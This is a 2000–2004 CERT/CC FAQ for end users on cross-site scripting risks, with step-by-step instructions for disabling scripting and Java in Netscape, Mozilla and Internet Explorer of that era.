CERT^® Coordination Center

Frequently Asked Questions About Malicious Web Scripts Redirected by Web Sites

Original release date: February 2, 2000
Last updated: December 7, 2004

A problem has been identified that can be found on a wide variety of web sites: what you receive from a web site may not be what that site meant to send. If you click on a specially designed link, the site may unknowingly send you bad data, unwanted pictures, and programs (malicious scripts) to compromise your data.

The problem is not with web browsers themselves but with how web pages are constructed and how data entering and leaving web sites is validated. "Validate" means ensuring no "unintended" characters are sent back to the client.

This document includes:

1. Frequently Asked Questions
2. Steps for Changing Your Options in Web Browsers

I. Frequently Asked Questions

How do malicious web scripts get to my web browser?

A malicious web developer may attach a script to something you send to a web site, such as a URL, an element in a form, or a database inquiry. When the web site responds to you, the malicious script comes along, so that it is now on your browser.

Among the ways you can potentially expose your web browser to malicious scripts are these:

• following untrusted links in web pages, email messages, or newsgroup postings
• using interactive forms on an untrustworthy site
• viewing dynamically generated pages that contain content developed by anyone but yourself

What might happen if my web browser is exposed to a malicious script?

Among the possibilities are that an attacker could capture your password and other information you believe is protected. You should also be concerned because malicious scripts can be used to expose restricted parts of your organization's local network (such as their intranet) to attackers who are on the Internet.

Some web browsers contain vulnerabilities in the security systems that determine what access a script should have to your computer or other web sites. In the case of these cross-zone or cross-domain vulnerabilities, a malicious script could download and install arbitrary software on your computer, or read or modify data on another web site.

Malicious scripts can also be used to alter the appearance of the browser, thus making social engineering or "phishing" attacks more successful. For example, a malicious script might open a browser windows outside of the visible screen area or cover the address bar with a spoofed address.

Attackers may be able to use malicious scripts to infect cookies with copies of themselves. If the infected cookie is sent back to a vulnerable web site and passed back to your browser, the malicious script may start running again. Note: This is not a vulnerability in web cookies; rather, a malicious script takes advantage of the functionality of cookies.

How can I avoid the problem?

The most significant impact of this vulnerability can be avoided by disabling all scripting languages. Follow the steps below to turn off options in your web browser that allow malicious scripts to run. If you're not using a current version of Internet Explorer, Netscape, or Mozilla you might need to modify the steps.

Note that even with scripting disabled, attackers may still be able to influence the appearance of content provided by a legitimate site by embedding other HTML tags. In particular, malicious use of the <FORM> tag is not prevented by disabling scripting languages.

How will turning off the options affect my use of the web?

While turning off the options will keep you from being vulnerable to malicious scripts, it will limit the interaction you can have with some web sites. You may notice a difference in functionality when you visit legitimate sites that use scripts running within the browser to add useful features.

Should I disable Java applets?

The risk associated with Java applets is significantly different from some of the other technologies. Java has a robust security mechanism designed to deal with situations like these that prevents sensitive information from being disclosed or client information from being damaged.

However, Java applets written by an attacker can still be loaded while your are viewing a legitimate web page. The problems that can arise are similar to those involving the <FORM> and other HTML tags. For example, an attacker could develop a "Trojan Horse" program that presented misleading information and prompted you for a password. If you failed to recognize the malicious applet for what it was, you could accidentally disclose sensitive information.

You must make your own determination about disabling Java applets, based on your tolerance for these risks. If you choose to disable Java, please see the detailed instructions below.

Is there any more information available about this problem?

The CERT/CC has published an advisory containing more details about the problem, its impact, and ways to deal with it. CA-2000-02 is available from

http://www.cert.org/advisories/CA-2000-02.html

You can also find information at the vendor URLs listed in the advisory.

The CERT/CC has also published a "tech tip" for web page developers and web site administrators, which you might want to pass along to the appropriate people in your organization. This document, "Malicious Content Mitigation for Web Developers," is available from

http://www.cert.org/tech_tips/malicious_code_mitigation.html

II. Steps for Changing Your Options in Web Browsers - Netscape, Mozilla, and Internet Explorer

Using Netscape 6

Note: Make sure that these instructions apply to your version of Netscape. To determine your software version, from the Help menu, select About Communicator... . A web page appears with information about your browser including the version number.

1. Start Netscape Communicator as you would when browsing the Internet.
2. From the Edit menu, select Preferences. The Preferences dialog box appears.
3. From the Category list, click on Advanced. (Do NOT click on the plus (+) sign.) The Advanced Preferences panel appears.
4. If you decide to disable java, uncheck Enable Java.
5. Uncheck Enable JavaScript.
6. Click OK to accept the changes.
7. Click the Padlock Icon in the lower left hand corner of your browser. The Security Info dialog box appears.
8. Click the Navigator link from the list on the left. The Navigator Security Settings panel appears.
9. In the Show a warning before: section, make sure the options Viewing a page with encrypted/unencrypted mix and Leaving an encrypted site are checked.
10. Click OK to accept the changes and close the dialog box.

Using Netscape 7 or Mozilla 1

Note: Make sure that these instructions apply to your version of Netscape or Mozilla. To determine your software version, from the Help menu, select About Communicator... or About Mozilla.... A web page appears with information about your browser including the version number.

1. Start Netscape Communicator or Mozilla as you would when browsing the Internet.
2. From the Edit menu, select Preferences. The Preferences dialog box appears.
3. From the Category list, click on Advanced. (Do NOT click on the plus (+) sign.) The Advanced Preferences panel appears.
4. If you decide to disable java, uncheck Enable Java.
5. Now click on the plus (+) sign next to the word Advanced.
6. Click on the category Scripts & Plug-Ins.
7. Uncheck the box Enable Javascript for Navigator.
8. Uncheck the box Enable JavaScript for Mail & Newsgroups.
9. From the Category list, click on the plus (+) sign next to Privacy and Security.
10. Click on the category Popup Windows.
11. Check the box Block unrequested popup windows.
12. Click on the category SSL.
13. Check all the options under section SSL Warnings.
14. Click OK to accept the changes.

For more technical information about Mozilla security features, see Component Secuity for Mozilla.

Using Internet Explorer 5 or 6

Note: Make sure that these instructions apply to your version of Internet Explorer. To determine your software version, from the Help menu, select About Internet Explorer... . A dialog box appears with information about your browser including the version number.

1. Start Internet Explorer as you would when browsing the Internet.
2. From the Tools menu select Internet Options... . The Internet Options dialog box appears.
3. Select the Security tab. The Security Options panel appears.
4. Click on the Internet zone to select it.
5. Click the Custom Level... button. The Security Settings panel appears.
6. Select the High option from the pull-down list.
7. Click the Reset button. A dialog box appears asking if you are sure you want to change the security settings for this zone.
8. Click Yes. You now need to scroll through the settings list and make the changes listed in the following steps.
9. For the setting Script ActiveX controls marked safe for Scripting, check the radio button for Disable or Prompt depending on your level of trust.
10. If you decide to disable Java, for the setting Java permissions, check the radio button for Disable Java. Note: If you have Microsoft Virtual Machine installed, this setting will be under the Microsoft VM section. If you do not have a Java permissions setting, Java is already disabled.
11. For the setting Active scripting under the Scripting section, confirm that the radio button for Disable is checked.
12. Click OK to accept these changes. A dialog box appears asking if you are sure you want to make these changes.
13. Click Yes.
14. In the Internet Options dialog box, click the Advanced tab. The Advanced Options panel appears.
15. Make sure the setting Warn if changing between secure and insecure under the Security setting is checked.
16. Click Apply to save your changes.
17. Click OK to close the Internet Options dialog box.

More information about Internet Explorer security is available from several Microsoft web pages: Increase Your Browsing and E-Mail Safety, Working with Internet Explorer 6 Security Settings, and Microsoft Knowledge Base Articles 833633 and 182569.

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:

CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from

http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site

http://www.cert.org/

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.

Copyright 2000 Carnegie Mellon University.